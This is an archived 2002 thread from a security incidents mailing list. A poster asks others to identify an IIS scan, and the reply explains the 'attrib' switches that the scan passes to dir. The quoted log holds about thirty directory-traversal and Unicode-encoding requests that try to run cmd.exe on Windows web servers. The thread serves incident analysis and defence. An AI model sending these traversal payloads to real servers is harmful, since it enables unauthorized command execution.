Re: Arhas?

From: Patrick Nolan (pnolan01@nycap.rr.com)
Date: 03/01/02

• Previous message: Starbuck Newton: "RE: Arhas?"
• In reply to: K M: "Arhas?"
• Next in thread: K M: "Re: Arhas?"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

---

From: "Patrick Nolan" <pnolan01@nycap.rr.com>
To: "K M" <kmoon01@hotmail.com>, <incidents@securityfocus.org>
Date: Fri, 1 Mar 2002 12:01:24 -0500

HTH,

Pat

http://www.microsoft.com/technet/treeview/default.asp?url=/TechNet/prodtechnol/winxppro/proddocs/attrib.asp

Attrib
Displays, sets, or removes the read-only, archive, system, and hidden attributes assigned to files or directories. Used without parameters, attrib displays attributes of all files in the current directory.

Syntax
attrib [{+r|-r}] [{+a|-a}] [{+s|-s}] [{+h|-h}] [[Drive:][Path] FileName] [/s[/d]]

Parameters
+r
Sets the read-only file attribute.
-r
Clears the read-only file attribute.
+a
Sets the archive file attribute.
-a
Clears the archive file attribute.
+s
Sets the system file attribute.
-s
Clears the system file attribute.
+h
Sets the hidden file attribute.
-h

----- Original Message -----
From: "K M" <kmoon01@hotmail.com>
To: <incidents@securityfocus.org>
Sent: Friday, March 01, 2002 10:56 AM
Subject: Arhas?

Hi,
  Does anybody recognize the IIS scan below? A google search on the string
"a-r-h-a-s" turns up a brief report on the incidents.org intrusions list,
but no identification.

TIA,
K

get /scripts/..%5c../winnt/system32/cmd.exe /c+dir/a-r-h-a-s 404 http/1.0
get /winnt/system32/cmd.exe /c+dir/a-r-h-a-s 404 http/1.0
get /scripts/..á../winnt/system32/cmd.exe /c+dir/a-r-h-a-s 404 http/1.0
get /scripts/..à%9v../winnt/system32/cmd.exe /c+dir/a-r-h-a-s 404 http/1.0
get /scripts/..à%qf../winnt/system32/cmd.exe /c+dir/a-r-h-a-s 404 http/1.0
get /scripts/..á%8s../winnt/system32/cmd.exe /c+dir/a-r-h-a-s 404 http/1.0
get /winnt/system32/cmd.exe /c+dir/a-r-h-a-s 404 http/1.0
get /scripts/..á%pc../winnt/system32/cmd.exe /c+dir/a-r-h-a-s 404 http/1.0
get /winnt/system32/cmd.exe /c+dir/a-r-h-a-s 404 http/1.0
get /scripts/..o../winnt/system32/cmd.exe /c+dir/a-r-h-a-s 404 http/1.0
get /winnt/system32/cmd.exe /c+dir/a-r-h-a-s 404 http/1.0
get /scripts/..ð??¯../winnt/system32/cmd.exe /c+dir/a-r-h-a-s 404 http/1.0
get /scripts/..ø???¯../winnt/system32/cmd.exe /c+dir/a-r-h-a-s 404 http/1.0
get /scripts/..ü????¯../winnt/system32/cmd.exe /c+dir/a-r-h-a-s 404 http/1.0
get /msadc/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir/a-r-h-a-s
404 http/1.0
get /winnt/system32/cmd.exe /c+dir/a-r-h-a-s 404 http/1.0
get /winnt/system32/cmd.exe /c+dir/a-r-h-a-s 404 http/1.0
get /_vti_bin/..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe
/c+dir/a-r-h-a-s 404 http/1.0
get /winnt/system32/cmd.exe /c+dir/a-r-h-a-s 404 http/1.0
get /iisadmpwd/..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe
/c+dir/a-r-h-a-s 404 http/1.0
get /winnt/system32/cmd.exe /c+dir/a-r-h-a-s 404 http/1.0
get /winnt/system32/cmd.exe /c+dir/a-r-h-a-s 404 http/1.0
get /cgi-bin/..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe
/c+dir/a-r-h-a-s 404 http/1.0
get /winnt/system32/cmd.exe /c+dir/a-r-h-a-s 404 http/1.0
get /samples/..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe
/c+dir/a-r-h-a-s 404 http/1.0
get /winnt/system32/cmd.exe /c+dir/a-r-h-a-s 404 http/1.0
get /winnt/system32/cmd.exe /c+dir/a-r-h-a-s 404 http/1.0
get /_vti_cnf/..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe
/c+dir/a-r-h-a-s 404 http/1.0
get /winnt/system32/cmd.exe /c+dir/a-r-h-a-s 404 http/1.0
get /adsamples/..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe
/c+dir/a-r-h-a-s 404 http/1.0
get /winnt/system32/cmd.exe /c+dir/a-r-h-a-s 404 http/1.0

_________________________________________________________________
Get your FREE download of MSN Explorer at http://explorer.msn.com/intl.asp.

----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management
and tracking system please see: http://aris.securityfocus.com

----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management
and tracking system please see: http://aris.securityfocus.com

---

• Previous message: Starbuck Newton: "RE: Arhas?"
• In reply to: K M: "Arhas?"
• Next in thread: K M: "Re: Arhas?"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

• Security
• UNIX
• Linux
• Coding
• Usenet

• News
• Mailing-Lists
• Newsgroups
• Service
• About
• Privacy
• Search
• Imprint

www.derkeiler.com  > Mailing-Lists  > securityfocus  > incidents  > 2002-03